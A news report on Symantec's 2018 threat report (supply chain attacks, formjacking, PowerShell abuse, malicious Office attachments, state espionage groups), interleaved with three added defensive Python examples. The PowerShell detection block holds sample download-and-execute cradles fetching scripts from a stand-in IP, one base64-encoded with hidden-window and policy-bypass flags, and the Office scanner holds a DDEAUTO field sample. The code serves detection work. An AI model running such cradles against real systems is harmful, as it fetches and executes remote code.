Supply Chain Attacks Nearly Doubled in 2018: Symantec

The number of supply chain attacks observed last year was 78% higher than in the previous year, a new Symantec report reveals.

Supply chain attacks aim to compromise a target by exploiting the third-party services and software it relies on, and they take many forms, including the hijacking of software updates to inject malicious code into legitimate software. Threat actors also abuse stolen credentials or compromised third-party libraries to exploit software developers in their attacks.

2018 saw a surge in formjacking attacks, once again proving that the supply chain can be a weak point for online retailers and eCommerce sites, Symantec reveals in its latest Internet Security Threat Report (ISTR). Many of these formjacking attacks stemmed from compromised third-party services used by online retailers, including chatbots and customer review widgets.
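Formjacking of the kind described above works because a third-party script runs with full access to the checkout page, so a compromised chatbot or review widget can read card fields at submit time. One practical check a retailer can automate is Subresource Integrity (SRI): pin each third-party script to a hash so the browser refuses a modified copy. The following Python is an added example, not code from the page or from Symantec. It scans a constructed checkout page for cross-origin scripts that carry no integrity attribute, and computes and verifies SRI hashes for a known-good script body. The HTML, the hostnames (shop.example, example-widgets.test), the paths and the script bodies are invented test input.

```python
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page for a hypothetical shop; every hostname and path is invented.
CHECKOUT_HTML = """
<html><body>
<form id="payment" action="/pay" method="post">
  <input name="card_number"><input name="cvv">
</form>
<script src="/static/app.js"></script>
<script src="https://chat.example-widgets.test/loader.js"></script>
<script src="https://reviews.example-widgets.test/widget.js"
        integrity="sha384-REPLACE-WITH-PINNED-HASH" crossorigin="anonymous"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def third_party_scripts_without_sri(html: str, first_party_host: str) -> list:
    """Return the src of every cross-origin script that carries no integrity attribute."""
    collector = ScriptCollector()
    collector.feed(html)
    flagged = []
    for attrs in collector.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline scripts are governed by CSP, not SRI
        host = urlparse(src).netloc
        if host and host != first_party_host and not attrs.get("integrity"):
            flagged.append(src)
    return flagged


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Produce the integrity attribute value for a known-good copy of a script."""
    digest = hashlib.new(algo, body).digest()
    return algo + "-" + base64.b64encode(digest).decode()


def verify_integrity(body: bytes, integrity: str) -> bool:
    """Check a fetched script body against an integrity attribute.

    Simplified from the browser algorithm: any listed sha256/sha384/sha512 hash
    that matches passes (browsers only consider the strongest algorithm listed).
    """
    for token in integrity.split():
        algo, _, expected = token.partition("-")
        if algo not in ("sha256", "sha384", "sha512"):
            continue
        actual = base64.b64encode(hashlib.new(algo, body).digest()).decode()
        if hmac.compare_digest(actual, expected):
            return True
    return False


if __name__ == "__main__":
    print("missing SRI:", third_party_scripts_without_sri(CHECKOUT_HTML, "shop.example"))
    good = b"window.reviews = {};"
    print("pin as:", sri_hash(good))
    tampered = good + b"\n// injected code that posts the card fields elsewhere"
    print("tampered copy accepted:", verify_integrity(tampered, sri_hash(good)))
```

The caveat that matters for the chatbot case: SRI only protects a static file. A loader that fetches further code at run time cannot be pinned this way, so the loader's own integrity is all the attribute guarantees; for that class of widget a restrictive Content-Security-Policy and monitoring of what the page actually loads are the remaining controls.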

Ransomware attacks went down 20% compared to 2017, but attacks against enterprises increased 12% and mobile ransomware surged 33%. Cryptojacking attacks dropped by 52% between January and December, likely influenced by a 90% drop in the value of Monero.

The use of off-the-shelf tools and operating system features to conduct attacks also increased in 2018, with PowerShell usage showing a massive surge: the number of scripts blocked at the endpoint went up 1,000% compared to the previous year.

“While we block on average 115,000 malicious PowerShell scripts each month, this only accounts for less than 1 percent of overall PowerShell usage. Effectively identifying and blocking these attacks requires the use of advanced detection methods such as analytics and machine learning,” Symantec notes.
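Symantec's figures above are about scripts blocked at the endpoint; a defender doing their own triage usually starts with the command lines and script blocks in Windows logs. The following Python is an added example, not code from the page or from Symantec. It scores constructed lines in the style of process-creation auditing (Event ID 4688 with command-line logging) and PowerShell script block logging (Event ID 4104) against a handful of living-off-the-land indicators, decoding -EncodedCommand payloads first so the base64 does not hide them. The host 198.51.100.7, the file names and the log lines are constructed, and the indicator list is illustrative rather than a complete detection rule.

```python
import base64
import re


def _enc(script: str) -> str:
    # -EncodedCommand takes the base64 of the script text in UTF-16LE, not UTF-8.
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed lines in the style of command-line auditing (4688) and script block
# logging (4104); the host 198.51.100.7 and file names are invented.
SAMPLE_LINES = [
    "Get-ChildItem C:\\Users | Measure-Object",
    "Get-Service -Name Spooler | Restart-Service",
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"),
    "Invoke-Command -ComputerName fs01 -ScriptBlock { Get-EventLog -LogName System -Newest 5 }",
]

# Indicators typical of living-off-the-land PowerShell. Each alone is common in admin
# use, which is why the verdict below requires several of them on one line.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(line: str) -> str:
    """Recover the script hidden behind -EncodedCommand, or '' if there is none."""
    m = ENCODED_RE.search(line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_line(line: str) -> dict:
    """Match indicators against the raw line plus its decoded payload."""
    decoded = decode_encoded_command(line)
    text = line + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"hits": hits, "decoded": decoded}


def suspicious(lines, threshold: int = 2) -> list:
    """Return (line, hits) for lines that trip at least `threshold` indicators."""
    results = []
    for line in lines:
        hits = score_line(line)["hits"]
        if len(hits) >= threshold:
            results.append((line, hits))
    return results


if __name__ == "__main__":
    for line, hits in suspicious(SAMPLE_LINES):
        print(hits, "<-", line[:70])
```

This is plain signature matching: it catches the two constructed attack lines and ignores the three ordinary admin commands, but string concatenation, character substitution or compressed payloads evade it, which is the gap the quote above is pointing at when it calls for analytics and machine learning. It also depends on script block logging and command-line auditing actually being enabled on the hosts.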

Attackers also switched focus to smaller organizations, which were more likely to be hit with spam, phishing, and email malware last year. Spam levels continued to rise in 2018, reaching 55% of all emails; email malware remained stable, while phishing dropped from 1 in 2,995 emails to 1 in 3,207 emails.

Microsoft Office accounted for 48% of all malicious email attachments, as cyber-crime groups such as Mealybug and Necurs used not only macros in Office files, but also malicious XML files and Office files with DDE payloads. There were fewer URLs used in malicious emails (7.8%) as attackers focused on malicious attachments.
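The attachment classes named above (macro documents, Word XML files and documents with DDE fields) all leave traces in the file itself that can be checked before the attachment ever reaches Office. The following Python is an added example, not code from the page or from Symantec. It builds two constructed OOXML documents in memory and flags a VBA project part, a macro-enabled content type, and DDE/DDEAUTO field codes, including the common evasion of splitting the field code across several text runs; it also applies the same field check to flat (unzipped) Word XML. The sample XML, the placeholder path and the part names are constructed, and the scanner is illustrative: it does not cover the legacy binary .doc/.xls formats or RTF.

```python
import io
import re
import zipfile

# Field instructions live in <w:instrText> runs, frequently split across several runs;
# the DDE and DDEAUTO field codes ask Word to start an external program.
INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
FLDSIMPLE_RE = re.compile(r'<w:fldSimple[^>]*w:instr="([^"]*)"')
FIELD_BEGIN_RE = re.compile(r'<w:fldChar[^>]*w:fldCharType="begin"')
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)

# Constructed documents: a clean one with an ordinary PAGE field, and one with a
# DDEAUTO field split across two runs the way evasive samples do it. The target
# path is a placeholder, not a real payload.
CLEAN_XML = (
    '<w:document><w:body><w:p><w:r><w:t>Invoice attached.</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> PAGE </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>'
)
DDE_XML = (
    '<w:document><w:body><w:p>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO "C:\\placeholder\\tool.exe" "arg" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '</w:p></w:body></w:document>'
)


def build_docx(document_xml: str, extra_parts: dict = None,
               content_types: str = "<Types/>") -> bytes:
    """Build a minimal OOXML container in memory (test input only, not a valid document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document_xml)
        for name, data in (extra_parts or {}).items():
            z.writestr(name, data)
    return buf.getvalue()


def _scan_xml(part_name: str, xml: str) -> list:
    findings = []
    if part_name == "[Content_Types].xml" and "macroEnabled" in xml:
        findings.append("macro-enabled content type")
    # Reassemble each field's instruction text before matching, so a code split
    # across runs ("DD" + "EAUTO") is still seen whole.
    for field in FIELD_BEGIN_RE.split(xml):
        code = "".join(INSTR_RE.findall(field))
        if DDE_RE.search(code):
            findings.append(f"DDE field code in {part_name}: {code.strip()[:60]}")
    for code in FLDSIMPLE_RE.findall(xml):
        if DDE_RE.search(code):
            findings.append(f"DDE field code in {part_name}: {code[:60]}")
    return findings


def scan_office_attachment(data: bytes) -> list:
    """Return findings for an attachment; an empty list means nothing was flagged."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        text = data.decode("utf-8", "replace")
        if "<w:" in text:  # flat Word XML (not zipped) carries the same field elements
            return _scan_xml("flat-xml", text)
        return ["not an OOXML container (legacy binary format or not an Office file)"]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower().endswith("vbaproject.bin"):
                findings.append("VBA macro project present")
            elif name.lower().endswith(".xml"):
                findings.extend(_scan_xml(name, z.read(name).decode("utf-8", "replace")))
    return findings


if __name__ == "__main__":
    print(scan_office_attachment(build_docx(CLEAN_XML)))
    print(scan_office_attachment(build_docx(DDE_XML)))
    print(scan_office_attachment(build_docx(CLEAN_XML, {"word/vbaProject.bin": b"\x00"})))
```

A finding is a triage signal rather than a verdict: legitimate field codes such as PAGE or MERGEFIELD are not flagged, a macro project is common in finance templates, and heavily obfuscated field text needs more careful reassembly than this shows. The point is that all three attachment types the report mentions can be sorted cheaply at the mail gateway before any sandboxing.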

The use of zero-day exploits continued to decline last year, with only 23% of attack groups using zero-days. Some attack groups such as Gallmaker switched to relying solely on “living off the land” techniques, without using malicious code.

Large attack groups intensified their activity in 2018 and also diversified their targets. More and more groups focused on compromising operational computers to mount disruptive operations, a tactic pioneered by the Dragonfly espionage group. The method was also adopted by groups such as Thrip and Chafer last year.

According to Symantec, the increased interest in potentially disruptive attacks was also reflected in the number of groups known to use destructive malware, which went up by 25% in 2018.

The number of indictments in the United States against people alleged to be involved in state-sponsored espionage also went up last year, with 49 individuals or organizations indicted. The US charged 18 alleged Russian agents with involvement in attacks relating to the 2016 presidential election, 19 Chinese individuals or organizations, 11 Iranians, and one North Korean.

“This sudden glare of publicity may disrupt some of the organizations named in these indictments. It will severely limit the ability of indicted individuals to travel internationally, potentially hampering their ability to mount operations against targets in other countries,” Symantec notes.